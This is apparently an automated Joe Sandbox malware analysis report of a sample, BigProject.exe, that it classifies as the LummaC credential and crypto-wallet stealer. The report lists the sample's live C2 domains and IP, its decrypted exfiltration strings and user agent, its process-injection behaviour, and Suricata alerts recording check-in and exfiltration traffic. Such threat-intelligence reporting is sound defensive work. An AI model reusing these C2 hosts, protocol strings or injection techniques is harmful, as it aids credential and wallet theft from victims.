Edit tour

Windows Analysis Report
BigProject.exe

Overview

General Information

Sample name:	BigProject.exe
Analysis ID:	1579291
MD5:	98acefb3b4d697642895f954c5256a49
SHA1:	6db25168111275435e21e68773dc88d1cf86cfd9
SHA256:	36ae8fda3c54b17e1a0609c07aab00a27c435244e19990d45327e21b16455718
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Adds / modifies Windows certificates

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

BigProject.exe (PID: 6008 cmdline: "C:\Users\user\Desktop\BigProject.exe" MD5: 98ACEFB3B4D697642895F954C5256A49)

Acrobat.exe (PID: 5520 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 6300 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 3292 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1508,i,10346652073434978683,7564369482762319465,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

CasPol.exe (PID: 7404 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "aspecteirs.lat", "discokeyus.lat", "crosshuaht.lat", "energyaffai.lat", "necklacebudi.lat", "stem-mellows.cyou"], "Build id": "OPCN2M--Sergei"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: CasPol.exe PID: 7404	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T13:17:21.986852+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	172.67.197.170	443	TCP
2024-12-21T13:17:24.747780+0100	2028371	3	Unknown Traffic	192.168.2.5	49715	172.67.197.170	443	TCP
2024-12-21T13:17:27.065928+0100	2028371	3	Unknown Traffic	192.168.2.5	49731	172.67.197.170	443	TCP
2024-12-21T13:17:29.394631+0100	2028371	3	Unknown Traffic	192.168.2.5	49741	172.67.197.170	443	TCP
2024-12-21T13:17:31.548202+0100	2028371	3	Unknown Traffic	192.168.2.5	49750	172.67.197.170	443	TCP
2024-12-21T13:17:33.876391+0100	2028371	3	Unknown Traffic	192.168.2.5	49756	172.67.197.170	443	TCP
2024-12-21T13:17:36.710322+0100	2028371	3	Unknown Traffic	192.168.2.5	49762	172.67.197.170	443	TCP
2024-12-21T13:17:40.621968+0100	2028371	3	Unknown Traffic	192.168.2.5	49773	172.67.197.170	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T13:17:23.478133+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49709	172.67.197.170	443	TCP
2024-12-21T13:17:25.519678+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49715	172.67.197.170	443	TCP
2024-12-21T13:17:41.374342+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49773	172.67.197.170	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T13:17:23.478133+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49709	172.67.197.170	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T13:17:25.519678+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49715	172.67.197.170	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T13:17:21.986852+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.5	49709	172.67.197.170	443	TCP
2024-12-21T13:17:24.747780+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.5	49715	172.67.197.170	443	TCP
2024-12-21T13:17:27.065928+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.5	49731	172.67.197.170	443	TCP
2024-12-21T13:17:29.394631+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.5	49741	172.67.197.170	443	TCP
2024-12-21T13:17:31.548202+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.5	49750	172.67.197.170	443	TCP
2024-12-21T13:17:33.876391+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.5	49756	172.67.197.170	443	TCP
2024-12-21T13:17:36.710322+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.5	49762	172.67.197.170	443	TCP
2024-12-21T13:17:40.621968+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.5	49773	172.67.197.170	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T13:17:20.422776+0100	2058360	1	Domain Observed Used for C2 Detected	192.168.2.5	64951	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T13:17:19.960727+0100	2058364	1	Domain Observed Used for C2 Detected	192.168.2.5	58190	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T13:17:34.549518+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49756	172.67.197.170	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "aspecteirs.lat", "discokeyus.lat", "crosshuaht.lat", "energyaffai.lat", "necklacebudi.lat", "stem-mellows.cyou"], "Build id": "OPCN2M--Sergei"}

Multi AV Scanner detection for submitted file

Source: BigProject.exe	Virustotal: Detection: 15%			Perma Link
Source: BigProject.exe	ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stem-mellows.cyou
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: OPCN2M--Sergei

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 7_2_00415799 CryptUnprotectData,

7_2_00415799

Source: BigProject.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49773 version: TLS 1.2

Source: BigProject.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]	7_2_00423860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov byte ptr [esi], al	7_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	7_2_0043ECA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov ecx, eax	7_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	7_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]	7_2_0043C767
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	7_2_0040B70C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov esi, eax	7_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov ecx, eax	7_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then jmp eax	7_2_0042984F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov edx, ecx	7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh	7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh	7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then test eax, eax	7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	7_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]	7_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov word ptr [ecx], bp	7_2_0041D83A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then push C0BFD6CCh	7_2_00423086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then push C0BFD6CCh	7_2_00423086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	7_2_0042B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000080h]	7_2_004179C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h	7_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov ebx, eax	7_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov word ptr [ecx], dx	7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov ebx, eax	7_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov ebp, eax	7_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov ebx, esi	7_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov word ptr [ebx], cx	7_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	7_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov byte ptr [edi], cl	7_2_0042CA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]	7_2_00416263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]	7_2_00415220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then push esi	7_2_00427AD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov byte ptr [edi], cl	7_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov word ptr [ebx], ax	7_2_0041B2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then push ebx	7_2_0043CA93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov word ptr [esi], cx	7_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_00428B61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov byte ptr [edi], cl	7_2_0042CB11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov byte ptr [edi], cl	7_2_0042CB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	7_2_0043F330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov ebx, eax	7_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov ebx, eax	7_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	7_2_00417380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	7_2_0041D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then cmp al, 2Eh	7_2_00426B95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	7_2_00435450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	7_2_00417380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then push 00000000h	7_2_00429C2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov word ptr [ecx], dx	7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	7_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	7_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h	7_2_004385E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then jmp eax	7_2_004385E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]	7_2_00417DEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then jmp dword ptr [0044450Ch]	7_2_00418591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov eax, dword ptr [ebp-68h]	7_2_00428D93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then xor edi, edi	7_2_0041759F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov eax, dword ptr [0044473Ch]	7_2_0041C653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov edx, ebp	7_2_00425E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then jmp dword ptr [004455F4h]	7_2_00425E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov ecx, eax	7_2_0043AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then xor byte ptr [esp+eax+17h], al	7_2_00408F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov byte ptr [edi], bl	7_2_00408F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_0042A700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov byte ptr [esi], al	7_2_0041BF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	7_2_00419F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]	7_2_0041E7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx eax, word ptr [edx]	7_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov word ptr [edi], dx	7_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov word ptr [esi], cx	7_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov ecx, ebx	7_2_0042DFE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then jmp ecx	7_2_0040BFFD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	7_2_0043EFB0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.5:64951 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49709 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49715 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49741 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:58190 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49731 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49750 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49773 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49756 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49762 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49709 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49709 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49756 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49773 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49715 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49715 -> 172.67.197.170:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: stem-mellows.cyou

Source: Joe Sandbox View	IP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox View	IP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox View	IP Address: 172.67.197.170 172.67.197.170

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49741 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49750 -> 172.67.197.170:443
